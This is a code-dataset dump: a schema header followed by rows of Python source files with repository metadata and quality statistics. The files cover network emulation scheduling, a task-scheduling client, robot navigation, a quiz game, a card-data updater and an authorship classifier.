hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a5582803ca69b47af8a599a971fe68204b6f9492
| 3,392
|
py
|
Python
|
apps/ndn_demoapps_wldr.py
|
theuerse/emulation_lib
|
d9388202d7ec9283404f9ab4d2448ff19922b44f
|
[
"MIT"
] | 2
|
2018-12-11T10:02:06.000Z
|
2019-04-01T10:39:09.000Z
|
apps/ndn_demoapps_wldr.py
|
theuerse/emulation_lib
|
d9388202d7ec9283404f9ab4d2448ff19922b44f
|
[
"MIT"
] | null | null | null |
apps/ndn_demoapps_wldr.py
|
theuerse/emulation_lib
|
d9388202d7ec9283404f9ab4d2448ff19922b44f
|
[
"MIT"
] | null | null | null |
import os
from .. import constants
from . import application
class NDN_DemoAppsWLDR(application.Application):
def __init__(self, server, clients, gateways, start, duration, server_params, client_params, routingcmds):
self.server = server
self.clients = clients
self.gateways = gateways
self.startTime = start
self.duration = duration
self.server_params = server_params
self.client_params = client_params
def generateCommands(self, config):
server_exe = "dashproducer"
client_exe = "dashplayer_WLDR"
# (sudo chrt -o -p 0 $BASHPID && dashplayer_WLDR --name /Node1/BBB_first100.mpd -r 12000 -l 500 -a buffer -o /home/nfd/emulation/results/consumer.log &) &
wldr_daemon_cmd = "(sudo chrt -o -p 0 $BASHPID && wldrdaemon_udp -l /var/run/shm/nfd_packet_log/nfd_packet_log.csv"
# start new server instance
self.server.scheduleCmd(constants.SETUP_TIME,"sudo " + server_exe + " " + self.server_params.strip() + " &")
# explicitly stop server at end of emulation
self.server.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall " + server_exe)
wlans = {}
# add commands for clients
for i in range(0, len(self.clients)):
client = self.clients[i]
gateway = self.gateways[i]
client_accessPoint_ip = gateway.getEmuIP(config)
if gateway not in wlans:
wlans[gateway] = [client.getEmuIP(config)]
else:
wlans[gateway].append(client.getEmuIP(config))
# start new client instance at begin of emulation
output_path = os.path.join(config['REMOTE_RESULT_DIR'], "consumer.log")
client.scheduleCmd(constants.SETUP_TIME, "sudo killall wldrdaemon_udp")
client.scheduleCmd(constants.SETUP_TIME, "fuser -k 12345/udp") # kill all application occupying the TCP-port 12345
# schedule server-side wldr-instance to start
client.scheduleCmd(self.startTime, wldr_daemon_cmd + " -d " + client_accessPoint_ip + " > demonlog.txt 2>&1 &) & ")
client.addAppResult(output_path, os.path.join(config['RESULT_DIR'], "consumer_" + str(client.getId()) + ".log_%RUN%"))
client.scheduleCmd(self.startTime , "(sudo chrt -o -p 0 $BASHPID && " + client_exe + " " + self.client_params + " -o " + output_path
+ " > /home/nfd/dashplayerlog.txt 2>&1 &) &")
# explicitly stop client at end of emulation
client.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall " + client_exe)
client.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall wldrdaemon_udp")
client.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall tail")
for accessPoint in wlans:
client_str = " -i ".join(wlans[accessPoint])
accessPoint.scheduleCmd(constants.SETUP_TIME, "sudo killall wldrdaemon_udp")
accessPoint.scheduleCmd(constants.SETUP_TIME, "fuser -k 12345/udp ")
accessPoint.scheduleCmd(constants.SETUP_TIME, wldr_daemon_cmd + " -i " + client_str + " > demonlog.txt 2>&1 &) &")
accessPoint.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall wldrdaemon_udp")
accessPoint.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall tail")
| 50.626866
| 163
| 0.645047
| 394
| 3,392
| 5.393401
| 0.296954
| 0.041412
| 0.070588
| 0.081882
| 0.349647
| 0.326118
| 0.249412
| 0.228706
| 0.053647
| 0
| 0
| 0.014363
| 0.240566
| 3,392
| 66
| 164
| 51.393939
| 0.810559
| 0.127358
| 0
| 0
| 0
| 0.022727
| 0.205015
| 0.024737
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.068182
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a55b04ba7921f1a3ec26bc5a38d932e27524c9ac
| 1,918
|
py
|
Python
|
catoclient/commands/scheduletasks.py
|
cloudsidekick/catoclient
|
26907127e38d01f56959618263f4bf61e60784ee
|
[
"Apache-2.0"
] | 1
|
2017-08-31T03:26:50.000Z
|
2017-08-31T03:26:50.000Z
|
catoclient/commands/scheduletasks.py
|
cloudsidekick/catoclient
|
26907127e38d01f56959618263f4bf61e60784ee
|
[
"Apache-2.0"
] | null | null | null |
catoclient/commands/scheduletasks.py
|
cloudsidekick/catoclient
|
26907127e38d01f56959618263f4bf61e60784ee
|
[
"Apache-2.0"
] | null | null | null |
#########################################################################
# Copyright 2011 Cloud Sidekick
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#########################################################################
import catoclient.catocommand
from catoclient.param import Param
import json
class ScheduleTasks(catoclient.catocommand.CatoCommand):
Description = 'Schedules one or more Tasks using a json template file.'
API = 'schedule_tasks'
Examples = '''
cato-schedule-tasks -s ./schedule_template.json
'''
Options = [Param(name='schedulefile', short_name='s', long_name='schedulefile',
optional=False, ptype='string',
doc='''The path to a json formatted schedule definition file. See the schedule_tasks API documentation for the format of the file.''')
]
def main(self):
try:
# first, we need to load the schedule definition
self.tasks = None
if self.schedulefile:
import os
fn = os.path.expanduser(self.schedulefile)
with open(fn, 'r') as f_in:
if not f_in:
print("Unable to open file [%s]." % fn)
self.tasks = f_in.read()
results = self.call_api(self.API, ['tasks'])
print(results)
except Exception as ex:
raise ex
| 39.142857
| 155
| 0.588634
| 227
| 1,918
| 4.933921
| 0.537445
| 0.053571
| 0.023214
| 0.028571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00563
| 0.259124
| 1,918
| 48
| 156
| 39.958333
| 0.782548
| 0.311262
| 0
| 0
| 0
| 0.037037
| 0.264655
| 0.02069
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.148148
| 0
| 0.37037
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a55cd95076293cb8d38f62d5a86be378db28011c
| 7,589
|
py
|
Python
|
highlevel_planning_ros/src/highlevel_planning_py/skills/navigate.py
|
ethz-asl/high_level_planning
|
094a73e993a6a9924f6ed067dcdbee70d1ead80e
|
[
"BSD-3-Clause"
] | null | null | null |
highlevel_planning_ros/src/highlevel_planning_py/skills/navigate.py
|
ethz-asl/high_level_planning
|
094a73e993a6a9924f6ed067dcdbee70d1ead80e
|
[
"BSD-3-Clause"
] | null | null | null |
highlevel_planning_ros/src/highlevel_planning_py/skills/navigate.py
|
ethz-asl/high_level_planning
|
094a73e993a6a9924f6ed067dcdbee70d1ead80e
|
[
"BSD-3-Clause"
] | null | null | null |
import pybullet as p
import numpy as np
from icecream import ic
from scipy.spatial.transform import Rotation as R
from highlevel_planning_py.tools.util import (
homogenous_trafo,
invert_hom_trafo,
pos_and_orient_from_hom_trafo,
SkillExecutionError,
)
class SkillNavigate:
def __init__(self, scene, robot):
self.robot_ = robot
self.robot_uid_ = robot.model.uid
self.scene_ = scene
def _check_collisions(self):
for _, obj in self.scene_.objects.items():
temp = p.getClosestPoints(self.robot_uid_, obj.model.uid, distance=0.5)
for elem in temp:
contact_distance = elem[8]
if contact_distance < 0.0:
# print("There is a collision")
return True
return False
def _move(self, pos, orient):
p.resetBasePositionAndOrientation(
self.robot_uid_, pos.tolist(), orient.tolist()
)
def move_to_object(self, target_name, nav_min_dist=None):
target_id = self.scene_.objects[target_name].model.uid
# Get the object position
temp = p.getBasePositionAndOrientation(target_id)
target_pos = np.array(temp[0])
# Get valid nav angles
nav_angle = self.scene_.objects[target_name].nav_angle
if nav_min_dist is None:
nav_min_dist = self.scene_.objects[target_name].nav_min_dist
# Move there
return self.move_to_pos(target_pos, nav_angle, nav_min_dist)
def move_to_pos(self, target_pos, nav_angle=None, nav_min_dist=None):
assert len(target_pos) == 3
assert type(target_pos) is np.ndarray
self.robot_.to_start()
# Get robot position
temp = p.getBasePositionAndOrientation(self.robot_uid_)
robot_pos = np.array(temp[0])
robot_orient = R.from_quat(temp[1])
# Get position and orientation of any object in the robot hand w.r.t the robot base
object_in_hand_uid = self._find_object_in_hand()
T_rob_obj = self._get_object_relative_pose(
object_in_hand_uid, robot_pos, robot_orient
)
if nav_angle is None:
alphas = np.arange(0.0, 2.0 * np.pi, 2.0 * np.pi / 10.0)
else:
alphas = np.array([nav_angle])
if nav_min_dist is None:
radii = np.arange(0.4, 2.0, 0.05)
else:
radii = nav_min_dist + np.arange(0.4, 2.0, 0.05)
# Iterate through points on circles around the target
# First vary the radius
for r in radii:
# Then vary the angle
for alpha in alphas:
direction_vec = np.array([np.cos(alpha), np.sin(alpha), 0])
robot_pos[:2] = target_pos[:2] + r * direction_vec[:2]
rotation = R.from_euler("z", np.pi + alpha, degrees=False)
robot_orient = rotation.as_quat()
# Put robot into this position
self._move(robot_pos, robot_orient)
if not self._check_collisions():
# Move object into robot's hand
self._set_object_relative_pose(
object_in_hand_uid, robot_pos, robot_orient, T_rob_obj
)
return True
return False
def _find_object_in_hand(self):
# Determine which object is in the robot's hand
object_in_hand_uid = None
object_in_hand_name = "nothing"
for obj_name, obj in self.scene_.objects.items():
temp = p.getClosestPoints(
self.robot_uid_,
obj.model.uid,
distance=0.01,
linkIndexA=self.robot_.link_name_to_index["panda_leftfinger"],
)
if len(temp) > 0:
if object_in_hand_uid is not None:
ic("---")
ic(object_in_hand_name)
ic(obj_name)
raise SkillExecutionError(
"Don't know how to deal with more than one object in robot's hand"
)
object_in_hand_uid = obj.model.uid
object_in_hand_name = obj_name
return object_in_hand_uid
def _get_object_relative_pose(self, object_in_hand_uid, robot_pos, robot_orient):
T_rob_obj = None
if object_in_hand_uid is not None:
# Get object position
temp = p.getBasePositionAndOrientation(object_in_hand_uid)
held_object_pos = np.array(temp[0])
held_object_orient = R.from_quat(temp[1])
# Compute object pose relative to robot
r_O_O_obj = held_object_pos
C_O_obj = held_object_orient
T_O_obj = homogenous_trafo(r_O_O_obj, C_O_obj)
r_O_O_rob = robot_pos
C_O_rob = robot_orient
T_O_rob = homogenous_trafo(r_O_O_rob, C_O_rob)
T_rob_obj = np.matmul(invert_hom_trafo(T_O_rob), T_O_obj)
# Check result
T_test = np.matmul(T_O_rob, T_rob_obj)
assert np.all(T_test - T_O_obj < 1e-12)
return T_rob_obj
def _set_object_relative_pose(
self, object_in_hand_uid, robot_pos, robot_orient, T_rob_obj
):
if object_in_hand_uid is not None:
r_O_O_rob = robot_pos
C_O_rob = R.from_quat(robot_orient)
T_O_rob = homogenous_trafo(r_O_O_rob, C_O_rob)
T_O_obj = np.matmul(T_O_rob, T_rob_obj)
(held_object_pos, held_object_orient) = pos_and_orient_from_hom_trafo(
T_O_obj
)
p.resetBasePositionAndOrientation(
object_in_hand_uid,
held_object_pos.tolist(),
held_object_orient.tolist(),
)
def get_nav_in_reach_description():
action_name = "nav-in-reach"
action_params = [
["current_pos", "navgoal"],
["goal_pos", "navgoal"],
["gid", "grasp_id"],
["rob", "robot"],
]
action_preconditions = [
("at", True, ["current_pos", "rob"]),
("has-grasp", True, ["goal_pos", "gid"]),
]
action_effects = [
("in-reach", True, ["goal_pos", "rob"]),
("in-reach", False, ["current_pos", "rob"]),
("at", True, ["goal_pos", "rob"]),
("at", False, ["current_pos", "rob"]),
]
action_exec_ignore_effects = [
("at", False, ["current_pos", "rob"]),
("in-reach", False, ["current_pos", "rob"]),
]
return (
action_name,
{
"params": action_params,
"preconds": action_preconditions,
"effects": action_effects,
"exec_ignore_effects": action_exec_ignore_effects,
},
)
def get_nav_at_description():
action_name = "nav-at"
action_params = [
["current_pos", "navgoal"],
["goal_pos", "navgoal"],
["rob", "robot"],
]
action_preconditions = [("at", True, ["current_pos", "rob"])]
action_effects = [
("at", True, ["goal_pos", "rob"]),
("at", False, ["current_pos", "rob"]),
("in-reach", False, ["current_pos", "rob"]),
]
action_exec_ignore_effects = [
("at", False, ["current_pos", "rob"]),
("in-reach", False, ["current_pos", "rob"]),
]
return (
action_name,
{
"params": action_params,
"preconds": action_preconditions,
"effects": action_effects,
"exec_ignore_effects": action_exec_ignore_effects,
},
)
| 34.339367
| 91
| 0.573593
| 966
| 7,589
| 4.15528
| 0.182195
| 0.03986
| 0.053812
| 0.04858
| 0.486049
| 0.41156
| 0.375934
| 0.349527
| 0.270553
| 0.238166
| 0
| 0.008777
| 0.324417
| 7,589
| 220
| 92
| 34.495455
| 0.774137
| 0.060087
| 0
| 0.288136
| 0
| 0
| 0.07461
| 0
| 0
| 0
| 0
| 0
| 0.016949
| 1
| 0.056497
| false
| 0
| 0.028249
| 0
| 0.141243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a569dd73bf4c737b5da9b60bab3083b5192099d3
| 5,151
|
py
|
Python
|
weakest_link/game.py
|
jmattfong/weakest-link
|
c4dba2b51a7271b83d3cc14b1329836805019671
|
[
"Apache-2.0"
] | null | null | null |
weakest_link/game.py
|
jmattfong/weakest-link
|
c4dba2b51a7271b83d3cc14b1329836805019671
|
[
"Apache-2.0"
] | null | null | null |
weakest_link/game.py
|
jmattfong/weakest-link
|
c4dba2b51a7271b83d3cc14b1329836805019671
|
[
"Apache-2.0"
] | null | null | null |
from weakest_link.util import wait_for_choice, green, red, dollars, get_random_mean_word, starts_with_vowel, format_time
class WeakestLinkGame :
def __init__(self, players, rounds, final_round) :
self.players = players
self.rounds = rounds
self.final_round = final_round
self.total_bank = 0
self.maximum_bank = 0
self.current_round = 0
# For the API
def get_current_round(self) :
return self.rounds[self.current_round] if self.current_round < len(self.rounds) else self.final_round
def get_current_round_name(self) :
return self.get_current_round().get_name()
def get_players(self) :
return self.players
def get_current_bank(self, color=True) :
if self.current_round >= len(self.rounds) :
return 0
return dollars(self.get_current_round().round_bank, color=color)
def get_total_bank(self, color=True) :
return dollars(self.total_bank, color=False)
def get_bank_links(self) :
if self.current_round >= len(self.rounds) :
return []
return [dollars(link, color=False) for link in self.get_current_round().bank_links]
def get_current_link(self) :
if self.current_round >= len(self.rounds) :
return 0
return self.get_current_round().current_link
def get_current_player_num(self) :
if self.current_round >= len(self.rounds) :
return 0
return self.get_current_round().get_current_player_num()
def get_time_remaining(self) :
if self.current_round >= len(self.rounds) :
return 0
time = self.get_current_round().seconds_remaining
time = time if time > 0 else 0
return format_time(time)
# For the CLI
def run(self) :
first_player = self.players[0]
for i in range(len(self.rounds)) :
self.current_round = i
if len(self.players) == 2 :
print("Not running all rounds since we don't have enough players")
print()
break
if i != 0 :
print('As the strongest link last round,', green(first_player), 'will go first')
print()
round = self.rounds[i]
self.try_to_start_round(i+1, round, first_player)
first_player = self.handle_finished_round_results(round)
if self.current_round < 2 :
print('Not voting off weakest link since we are on round', self.current_round+1)
weakest_link = None
elif self.current_round == 2 :
print(red('Time to vote off multiple players!'))
weakest_link = self.vote_for_weakest_link()
weakest_link = self.vote_for_weakest_link()
weakest_link = self.vote_for_weakest_link()
else :
weakest_link = self.vote_for_weakest_link()
if first_player == weakest_link :
first_player = round.get_strongest_link(first_player)
self.current_round = len(self.rounds)
while len(self.players) > 2 :
weakest_link = self.vote_for_weakest_link()
if first_player == weakest_link :
first_player = round.get_strongest_link(first_player)
first_player = wait_for_choice('As the strongest link last round, ' + green(first_player) + ' chooses who will go first in the ' +\
red('final round') + '. Choices: ' + ", ".join(self.players) + ' > ', self.players)
self.try_to_start_round('Final', self.final_round, first_player)
print(green(str(self.final_round.winner) + ' is the winner! They win ' + dollars(self.total_bank)))
print()
print("Game over, goodnight!")
# Helpers
def try_to_start_round(self, round_num, round, first_player) :
wait_for_choice("Enter 'S' to start round " + str(round_num) + " > ", 'S')
print('Starting round', round_num)
print()
round.start_round(self.players, first_player)
print('Finished round', round_num)
print()
def handle_finished_round_results(self, round) :
# TODO determine next first player and total bank
self.total_bank += round.round_bank
self.maximum_bank += round.bank_links[-1]
strongest_link = round.get_strongest_link()
print('That round the team banked', dollars(round.round_bank))
adjective = get_random_mean_word()
print('Out of a possible', dollars(self.maximum_bank), "the team banked", 'an' if starts_with_vowel(adjective) else 'a', adjective, dollars(self.total_bank))
print('Statistically, the', green('strongest link'), 'was', green(strongest_link))
print('Statistically, the', red('weakest link'), 'was', red(round.get_weakest_link()))
print()
return strongest_link
def vote_for_weakest_link(self) :
weakest_link = wait_for_choice("Who is the weakest link? Choices: " + ', '.join(self.players) + " > ", self.players)
self.players.remove(weakest_link)
return weakest_link
| 40.559055
| 165
| 0.628422
| 665
| 5,151
| 4.613534
| 0.180451
| 0.078879
| 0.067797
| 0.041069
| 0.340939
| 0.264342
| 0.244785
| 0.210561
| 0.210561
| 0.169166
| 0
| 0.004804
| 0.272568
| 5,151
| 126
| 166
| 40.880952
| 0.813985
| 0.015337
| 0
| 0.244898
| 0
| 0
| 0.109927
| 0
| 0
| 0
| 0
| 0.007937
| 0
| 1
| 0.142857
| false
| 0
| 0.010204
| 0.040816
| 0.326531
| 0.183673
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a56b8b89c70b03cbae514c630dd4557886c37a12
| 1,338
|
py
|
Python
|
infiltrate/models/card/expedition.py
|
Qazzquimby/eternalCardEvaluator
|
ef8640ed819a89e5198f8aedf0861a29c57c5720
|
[
"MIT"
] | 4
|
2019-04-08T09:30:10.000Z
|
2020-09-15T19:25:30.000Z
|
infiltrate/models/card/expedition.py
|
Qazzquimby/eternalCardEvaluator
|
ef8640ed819a89e5198f8aedf0861a29c57c5720
|
[
"MIT"
] | 19
|
2019-04-09T19:02:14.000Z
|
2020-12-25T05:22:45.000Z
|
infiltrate/models/card/expedition.py
|
Qazzquimby/eternalCardEvaluator
|
ef8640ed819a89e5198f8aedf0861a29c57c5720
|
[
"MIT"
] | null | null | null |
import typing as t
import infiltrate.browsers as browsers
import infiltrate.eternal_warcy_cards_browser as ew_cards
import infiltrate.models.card as card_mod
from infiltrate import db
def update_is_in_expedition():
"""Sets the is_in_expedition column of the cards table
to match Eternal Warcry readings."""
card_mod.Card.query.update({"is_in_expedition": False})
expedition_card_ids = _get_expedition_card_ids()
for card_id in expedition_card_ids:
card_mod.Card.query.filter(
card_mod.Card.set_num == card_id.set_num,
card_mod.Card.card_num == card_id.card_num,
).update({"is_in_expedition": True})
db.session.commit()
def _get_expedition_card_ids() -> t.List[card_mod.CardId]:
expedition_id = _get_expedition_id()
root_url = ew_cards.get_ew_cards_root_url(expedition_id=expedition_id)
return ew_cards.get_card_ids_in_search(root_url)
def _get_expedition_id():
card_url = "https://eternalwarcry.com/cards"
most_recent_expedition_selector = "#Expedition > option:nth-child(2)"
element = browsers.get_first_element_from_url_and_selector(
url=card_url, selector=most_recent_expedition_selector
)
expedition_id = element.attrs["value"]
return expedition_id
if __name__ == "__main__":
result = _get_expedition_card_ids()
| 32.634146
| 74
| 0.750374
| 193
| 1,338
| 4.751295
| 0.34715
| 0.091603
| 0.092694
| 0.065431
| 0.082879
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000891
| 0.161435
| 1,338
| 40
| 75
| 33.45
| 0.816399
| 0.063528
| 0
| 0
| 0
| 0
| 0.087691
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.178571
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a56e7c7d3eb512b85fa07082bf02be47726e19fd
| 8,373
|
py
|
Python
|
attribution/authorship_pipeline/classifiers/BaseClassifier.py
|
yangzhou6666/authorship-detection
|
f28701dea256da70eb8ba216c2572e1975c99b54
|
[
"MIT"
] | 14
|
2020-10-26T06:05:55.000Z
|
2022-03-08T08:32:17.000Z
|
attribution/authorship_pipeline/classifiers/BaseClassifier.py
|
yangzhou6666/authorship-detection
|
f28701dea256da70eb8ba216c2572e1975c99b54
|
[
"MIT"
] | 10
|
2020-02-29T16:55:20.000Z
|
2021-11-06T10:40:32.000Z
|
attribution/authorship_pipeline/classifiers/BaseClassifier.py
|
yangzhou6666/authorship-detection
|
f28701dea256da70eb8ba216c2572e1975c99b54
|
[
"MIT"
] | 4
|
2021-07-28T12:27:46.000Z
|
2021-10-04T18:12:33.000Z
|
from collections import namedtuple
from math import ceil
from typing import Tuple, Dict, Union, List, Counter
import numpy as np
import pandas as pd
from classifiers.config import Config
from data_loading.PathMinerDataset import PathMinerDataset
from data_loading.PathMinerLoader import PathMinerLoader
from data_loading.PathMinerSnapshotLoader import PathMinerSnapshotLoader
from preprocessing.context_split import PickType, ContextSplit
from util import ProcessedFolder, ProcessedSnapshotFolder
ClassificationResult = namedtuple(
'ClassificationResult',
('accuracy', 'macro_precision', 'macro_recall', 'fold_ind')
)
def compute_classification_result(
true_labels: List, predicted_labels: List, fold_ind: Union[int, Tuple[int, int]]
) -> ClassificationResult:
"""
Compute metric values (accuracy, precision, recall), given the predictions.
:param true_labels: true authors
:param predicted_labels: model's predictions
:param fold_ind: index that is used to refer to the fold in cross-validation
:return: an instance of ClassificationResult that contains the computed metric values
"""
true_labels = np.array(true_labels, dtype=np.int)
predicted_labels = np.array(predicted_labels, dtype=np.int)
labels, counts = np.unique(true_labels, return_counts=True)
tp, fp, tn, fn = 0, 0, 0, 0
precisions = []
recalls = []
# print('===========')
# for true_label, predicted_label in zip(true_labels, predicted_labels):
# if true_label != predicted_label:
# print(f'true: {true_label} predicted: {predicted_label}')
# print('===========')
for label, count in zip(labels, counts):
true_positive = np.sum(np.logical_and(true_labels == label, predicted_labels == label))
false_positive = np.sum(np.logical_and(true_labels != label, predicted_labels == label))
true_negative = np.sum(np.logical_and(true_labels != label, predicted_labels != label))
false_negative = np.sum(np.logical_and(true_labels == label, predicted_labels != label))
tp += true_positive
fp += false_positive
tn += true_negative
fn += false_negative
precisions.append(tp / (tp + fp) if (tp + fp > 0) else 0.)
recalls.append(tp / (tp + fn))
return ClassificationResult(
accuracy=np.mean(true_labels == predicted_labels),
macro_precision=np.mean(precisions),
macro_recall=np.mean(recalls),
fold_ind=fold_ind
)
class BaseClassifier:
"""
Base class for all classifiers that handles correct setup of data loading, data splitting, and cross-validation.
"""
def __init__(self, config: Config, project_folder: Union[ProcessedFolder, ProcessedSnapshotFolder],
change_entities: pd.Series, change_to_time_bucket: Dict, min_max_count: Tuple[int, int],
author_occurrences: Counter, context_splits: List[ContextSplit]):
self.config = config
self.__fix_random()
if config.mode() == "snapshot":
self._loader = PathMinerSnapshotLoader(project_folder)
else:
self._loader = PathMinerLoader(
project_folder, change_entities, change_to_time_bucket, min_max_count, author_occurrences,
context_splits
)
self.__indices_per_class, self._n_classes = self.__split_into_classes()
self.update_chosen_classes()
self.models = {}
def __fix_random(self):
np.random.seed(self.config.seed())
self.__seed = self.config.seed()
def __split_into_classes(self) -> Tuple[np.ndarray, int]:
"""
Computes indices that belong to each class (author).
"""
print("Splitting into classes")
index = self._loader.labels()
n_classes = self._loader.n_classes()
indices_per_class = [[] for _ in range(n_classes)]
for i, ind in enumerate(index):
indices_per_class[ind].append(i)
indices_per_class = np.array([np.array(inds, dtype=np.int32) for inds in indices_per_class])
